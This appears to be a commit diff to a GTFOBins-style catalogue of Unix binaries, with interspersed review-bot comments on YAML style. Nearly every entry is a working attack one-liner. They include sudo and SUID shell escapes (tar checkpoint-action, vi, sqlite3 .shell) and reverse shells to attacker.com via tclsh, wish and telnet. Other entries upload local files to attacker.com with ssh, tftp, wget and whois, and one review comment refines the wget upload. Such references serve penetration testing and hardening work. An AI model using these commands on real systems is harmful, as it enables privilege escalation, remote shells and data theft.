bind-shell-interactive: bind-shell-interactive:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> - description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
on the attacker box to connect to the shell. code: |
code: | LPORT=12345
LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
--- ---


@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sort -m "$LFILE" sort -m "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./sort -m "$LFILE" ./sort -m "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo sort -m "$LFILE" sudo sort -m "$LFILE"
--- ---


@ -1,21 +1,21 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: sqlite3 /dev/null '.shell /bin/sh' - code: sqlite3 /dev/null '.shell /bin/sh'
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";' sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sqlite3 << EOF sqlite3 << EOF
CREATE TABLE t(line TEXT); CREATE TABLE t(line TEXT);
.import $LFILE t .import $LFILE t
SELECT * FROM t; SELECT * FROM t;
EOF EOF
sudo-enabled: sudo-enabled:
- code: sudo sqlite3 /dev/null '.shell /bin/sh' - code: sudo sqlite3 /dev/null '.shell /bin/sh'
suid-limited: suid-limited:
- code: "./sqlite3 /dev/null '.shell /bin/sh'" - code: "./sqlite3 /dev/null '.shell /bin/sh'"
--- ---
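Review bot: The `suid-limited` entry still wraps its command in double quotes, `- code: "./sqlite3 /dev/null '.shell /bin/sh'"`, while this same commit strips the equivalent quoting from the `suid-*` entries of the stdbuf, strace, tar and taskset files, and the `execute-interactive` entry two lines up already uses the plain-scalar form for an identical command. For consistency with the rest of the reformat the line could read `- code: ./sqlite3 /dev/null '.shell /bin/sh'`. This is style only; the parsed value is the same either way.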


@ -1,32 +1,30 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- description: Reconnecting may help bypassing restricted shells. - description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option. - description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
x
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
RPATH=file_to_save RPATH=file_to_save
LPATH=file_to_send LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH ssh $HOST "cat > $RPATH" < $LPATH
download: download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
RPATH=file_to_get RPATH=file_to_get
LPATH=file_to_save LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH ssh $HOST "cat $RPATH" > $LPATH
file-read: file-read:
- description: The read file content is corrupted by error prints. - description: The read file content is corrupted by error prints.
code: | code: |
LFILE=file_to_read LFILE=file_to_read
ssh -F $LFILE localhost ssh -F $LFILE localhost
sudo-enabled: sudo-enabled:
- description: Spawn interactive root shell through ProxyCommand option. - description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
-i'" x
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: stdbuf -i0 /bin/sh - code: stdbuf -i0 /bin/sh
suid-enabled: suid-enabled:
- code: "./stdbuf -i0 /bin/sh -p" - code: ./stdbuf -i0 /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo stdbuf -i0 /bin/sh - code: sudo stdbuf -i0 /bin/sh
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: strace -o /dev/null /bin/sh - code: strace -o /dev/null /bin/sh
suid-enabled: suid-enabled:
- code: "./strace -o /dev/null /bin/sh -p" - code: ./strace -o /dev/null /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh - code: sudo strace -o /dev/null /bin/sh
--- ---


@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
tail -c1G "$LFILE" tail -c1G "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./tail -c1G "$LFILE" ./tail -c1G "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo tail -c1G "$LFILE" sudo tail -c1G "$LFILE"
--- ---


@ -1,24 +1,24 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive: execute-non-interactive:
- description: This only works for GNU tar. - description: This only works for GNU tar.
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
file-write: file-write:
- description: This only works for GNU tar. - description: This only works for GNU tar.
code: | code: |
LFILE=file_to_write LFILE=file_to_write
TF=$(mktemp) TF=$(mktemp)
echo data > "$TF" echo data > "$TF"
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
file-read: file-read:
- description: This only works for GNU tar. - description: This only works for GNU tar.
code: | code: |
LFILE=file_to_read LFILE=file_to_read
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
sudo-enabled: sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited: suid-limited:
- code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh" - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: taskset 1 /bin/sh - code: taskset 1 /bin/sh
suid-enabled: suid-enabled:
- code: "./taskset 1 /bin/sh -p" - code: ./taskset 1 /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo taskset 1 /bin/sh - code: sudo taskset 1 /bin/sh
--- ---


@ -1,21 +1,21 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
tclsh tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive: reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
suid-enabled: suid-enabled:
- code: | - code: |
./tclsh ./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr exec /bin/sh -p <@stdin >@stdout 2>@stderr
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo tclsh sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr
--- ---


@ -1,18 +1,16 @@
--- ---
description: 'It can only append data if the destination exists. description: It can only append data if the destination exists.
'
functions: functions:
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo data | ./tee -a "$LFILE" echo data | ./tee -a "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo data | ./tee -a "$LFILE" echo data | ./tee -a "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo data | sudo tee -a "$LFILE" echo data | sudo tee -a "$LFILE"
--- ---
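Review bot: The unprivileged `file-write` entry invokes `./tee` (second line of its `code` block) while the sibling files touched by this commit (`ul`, `uniq`, `unexpand`, `xxd`) call the bare command for their unprivileged functions and reserve the `./` form for `suid-enabled`; `echo data | tee -a "$LFILE"` would follow that convention, matching how the `sudo-enabled` entry already uses `sudo tee`. The description's claim that tee "can only append data if the destination exists" also looks worth re-checking, since I would expect `tee -a` to create a missing target, but that is tee behaviour rather than anything this hunk shows. Folding the single-quoted scalar into a plain one drops the trailing newline the old value carried, which is a value change rather than pure lint, though harmless if the site only renders the text.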


@ -1,35 +1,35 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
telnet $RHOST $RPORT telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
TF=$(mktemp) TF=$(mktemp)
rm $TF rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled: sudo-enabled:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
sudo telnet $RHOST $RPORT sudo telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
./telnet $RHOST $RPORT ./telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
--- ---


@ -1,15 +1,15 @@
--- ---
functions: functions:
upload: upload:
- description: Send local file to a TFTP server. - description: Send local file to a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
tftp $RHOST tftp $RHOST
put file_to_send put file_to_send
download: download:
- description: Fetch a remote file from a TFTP server. - description: Fetch a remote file from a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
tftp $RHOST tftp $RHOST
get file_to_get get file_to_get
--- ---


@ -1,12 +1,10 @@
--- ---
description: | description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
Note that the shell might have its own builtin time implementation, which may
behave differently than` /usr/bin/time`, hence the absolute path.
functions: functions:
execute-interactive: execute-interactive:
- code: "/usr/bin/time /bin/sh" - code: /usr/bin/time /bin/sh
suid-enabled: suid-enabled:
- code: "./time /bin/sh -p" - code: ./time /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo /usr/bin/time /bin/sh - code: sudo /usr/bin/time /bin/sh
--- ---
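Review bot: The re-flowed `description` keeps a misplaced backtick: the code span opens after `than` instead of immediately before `/usr/bin/time`, so the rendered sentence puts the space inside the code span and leaves the path's closing backtick dangling; it should read "behave differently than" followed by `/usr/bin/time` as the code span, then ", hence the absolute path." Converting the `|` block scalar to a plain scalar also drops the trailing newline and joins the two lines with a space, which is fine for rendered prose but is a value change rather than a pure lint fix.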


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: timeout 7d /bin/sh - code: timeout 7d /bin/sh
suid-enabled: suid-enabled:
- code: "./timeout 7d /bin/sh -p" - code: ./timeout 7d /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo timeout --foreground 7d /bin/sh - code: sudo timeout --foreground 7d /bin/sh
--- ---


@ -1,18 +1,16 @@
--- ---
description: | description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces.
The read file content is corrupted by replacing occurrences of `$'\b_'` to
terminal sequences and by converting tabs to spaces.
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
ul "$LFILE" ul "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./ul "$LFILE" ./ul "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo ul "$LFILE" sudo ul "$LFILE"
--- ---
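Review bot: The re-flowed `description` reads "replacing occurrences of `$'\b_'` to terminal sequences", which should be "with terminal sequences" (or "by terminal sequences"); suggested text: `The read file content is corrupted by replacing occurrences of $'\b_' with terminal underline sequences and by converting tabs to spaces.` with the escape kept in a code span as before. Since ul's output depends on the terminal it targets, a short hint that the result varies with the terminal type would help a reader judge whether this read primitive is usable, but I am inferring that from ul's purpose rather than from this hunk.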


@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
unexpand -t99999999 "$LFILE" unexpand -t99999999 "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./unexpand -t99999999 "$LFILE" ./unexpand -t99999999 "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo unexpand -t99999999 "$LFILE" sudo unexpand -t99999999 "$LFILE"
--- ---


@ -1,18 +1,16 @@
--- ---
description: 'The read file content is corrupted by squashing multiple adjacent lines. description: The read file content is corrupted by squashing multiple adjacent lines.
'
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
uniq "$LFILE" uniq "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./uniq "$LFILE" ./uniq "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo uniq "$LFILE" sudo uniq "$LFILE"
--- ---
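Review bot: The re-flowed `description` says the content is corrupted by "squashing multiple adjacent lines", which overstates the damage: uniq only collapses runs of adjacent identical lines, so `The read file content is corrupted by collapsing runs of adjacent identical lines.` is the more accurate statement for someone deciding whether this read primitive is usable on a given file. Dropping the old single-quoted scalar's trailing newline is otherwise harmless here.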


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: unshare /bin/sh - code: unshare /bin/sh
suid-enabled: suid-enabled:
- code: "./unshare -r /bin/sh" - code: ./unshare -r /bin/sh
sudo-enabled: sudo-enabled:
- code: sudo unshare /bin/sh - code: sudo unshare /bin/sh
--- ---


@ -1,21 +1,19 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: vi -c ':!/bin/sh' - code: vi -c ':!/bin/sh'
- code: | - code: |
vi vi
:set shell=/bin/sh :set shell=/bin/sh
:shell :shell
file-write: file-write:
- code: | - code: |
vi file_to_write vi file_to_write
w w
file-read: file-read:
- code: 'vi file_to_read - code: vi file_to_read
'
suid-enabled: suid-enabled:
- code: "./vi -c ':!/bin/sh -p'" - code: ./vi -c ':!/bin/sh -p'
sudo-enabled: sudo-enabled:
- code: sudo vi -c ':!/bin/sh' - code: sudo vi -c ':!/bin/sh'
--- ---
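Review bot: The `file-write` entry's second line is a bare `w`, which in vi's normal mode is a word motion rather than a save; the ex command that writes the buffer is `:w`, so the entry presumably wants `:w`, and as written nothing is inserted before saving, so the user has to type content first for the file to hold any data. The `file-read` value also changes from a single-quoted scalar with a trailing newline to a plain scalar without one, which is harmless for a one-line command but is a value change beyond lint.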


@ -1,12 +1,12 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- code: watch /usr/bin/id - code: watch /usr/bin/id
suid-enabled: suid-enabled:
- description: This keeps the SUID privileges only if the `-x` option is present. - description: This keeps the SUID privileges only if the `-x` option is present.
code: "./watch -x /usr/bin/id" code: ./watch -x /usr/bin/id
sudo-enabled: sudo-enabled:
- code: sudo watch /usr/bin/id - code: sudo watch /usr/bin/id
suid-limited: suid-limited:
- code: "./watch /usr/bin/id" - code: ./watch /usr/bin/id
--- ---


@ -1,16 +1,15 @@
--- ---
functions: functions:
upload: upload:
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
Run an HTTP service on the attacker box to collect the file. code: |
code: | export URL=http://attacker.com/
export URL=http://attacker.com/ export LFILE=file_to_send
export LFILE=file_to_send wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
wget $URL -O $LFILE wget $URL -O $LFILE
--- ---
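Review bot: In the `upload` entry the base64 payload goes into `--post-data` without percent-encoding, and wget labels such bodies `application/x-www-form-urlencoded`, so a collector that form-decodes the body will turn every `+` into a space and silently corrupt the file; either percent-encode `+`, `/` and `=` or state in the description that the receiver must read the raw body. `$LFILE` and `$URL` are also left unquoted here, unlike the `"$LFILE"` quoting used throughout the rest of this commit. A one-line variant that handles both: `wget --post-data="d=$(base64 "$LFILE" | tr -d '\n' | sed 's/+/%2B/g;s,/,%2F,g;s/=/%3D/g')" "$URL"`.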


@ -1,37 +1,31 @@
--- ---
description: "`whois` hangs waiting for the remote peer to close the socket.\n" description: |
`whois` hangs waiting for the remote peer to close the socket.
functions: functions:
upload: upload:
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` code: |
and its length is limited by the maximum size of arguments. RHOST=attacker.com
code: | RPORT=12345
RHOST=attacker.com LFILE=file_to_send
RPORT=12345 whois -h $RHOST -p $RPORT "`cat $LFILE`"
LFILE=file_to_send - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
whois -h $RHOST -p $RPORT "`cat $LFILE`" code: |
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' RHOST=attacker.com
| base64 -d > "file_to_save"` on the attacker box to collect the file. The file RPORT=12345
length is limited by the maximum size of arguments. LFILE=file_to_send
code: | whois -h $RHOST -p $RPORT "`base64 $LFILE`"
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
whois -h $RHOST -p $RPORT "`base64 $LFILE`"
download: download:
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
< "file_to_send"` on the attacker box to send the file. The file has instances code: |
of `$'\x0d'` stripped. RHOST=attacker.com
code: | RPORT=12345
RHOST=attacker.com LFILE=file_to_save
RPORT=12345 whois -h $RHOST -p $RPORT > "$LFILE"
LFILE=file_to_save - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
whois -h $RHOST -p $RPORT > "$LFILE" code: |
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" RHOST=attacker.com
| nc -l -p 12345` on the attacker box to send the file. RPORT=12345
code: | LFILE=file_to_save
RHOST=attacker.com whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
--- ---
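Review bot: In both `upload` entries the file content is passed as a positional argument via backtick substitution, so a file whose first byte is `-` would be parsed by whois as an option, and `$LFILE` is unquoted inside the substitution unlike the `"$LFILE"` used in the `download` entries; `whois -h "$RHOST" -p "$RPORT" -- "$(cat "$LFILE")"` addresses both, assuming the whois build honours `--` as a getopt-based one would. The descriptions already note the argument-length limit; it would help to add that command substitution also strips trailing newlines and cannot carry NUL bytes, which is the reason the base64 variant exists.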


@ -1,17 +1,17 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
wish wish
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive: reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo wish sudo wish
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr
--- ---


@ -1,16 +1,14 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- code: xargs -a /dev/null /usr/bin/id - code: xargs -a /dev/null /usr/bin/id
file-read: file-read:
- description: This works as long as the file does not contain the NUL character, - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. code: |
GNU version only. LFILE=file_to_read
code: | xargs -a "$LFILE" -0
LFILE=file_to_read
xargs -a "$LFILE" -0
suid-enabled: suid-enabled:
- code: "./xargs -a /dev/null /usr/bin/id" - code: ./xargs -a /dev/null /usr/bin/id
sudo-enabled: sudo-enabled:
- code: sudo xargs -a /dev/null /usr/bin/id - code: sudo xargs -a /dev/null /usr/bin/id
--- ---


@ -1,19 +1,19 @@
--- ---
functions: functions:
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo data | xxd | xxd -r - "$LFILE" echo data | xxd | xxd -r - "$LFILE"
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
xxd "$LFILE" | xxd -r xxd "$LFILE" | xxd -r
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./xxd "$LFILE" | xxd -r ./xxd "$LFILE" | xxd -r
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo xxd "$LFILE" | xxd -r sudo xxd "$LFILE" | xxd -r
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: zsh - code: zsh
suid-enabled: suid-enabled:
- code: "./zsh" - code: ./zsh
sudo-enabled: sudo-enabled:
- code: sudo zsh - code: sudo zsh
--- ---